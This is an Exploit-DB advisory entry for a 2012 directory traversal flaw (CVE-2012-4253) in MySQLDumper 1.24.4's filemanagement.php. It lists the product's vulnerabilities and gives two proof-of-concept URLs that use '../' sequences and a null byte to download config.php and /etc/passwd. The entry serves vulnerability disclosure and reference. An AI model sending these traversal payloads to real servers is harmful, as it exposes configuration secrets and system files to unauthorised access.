MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access
2012-04-27T00:00:00
ID: EDB-ID:37129
Type: exploitdb
Reporter: AkaStep
Modified: 2012-04-27T00:00:00
Description
MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access. CVE-2012-4253. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, view and execute local files within the context of the webserver process, and retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00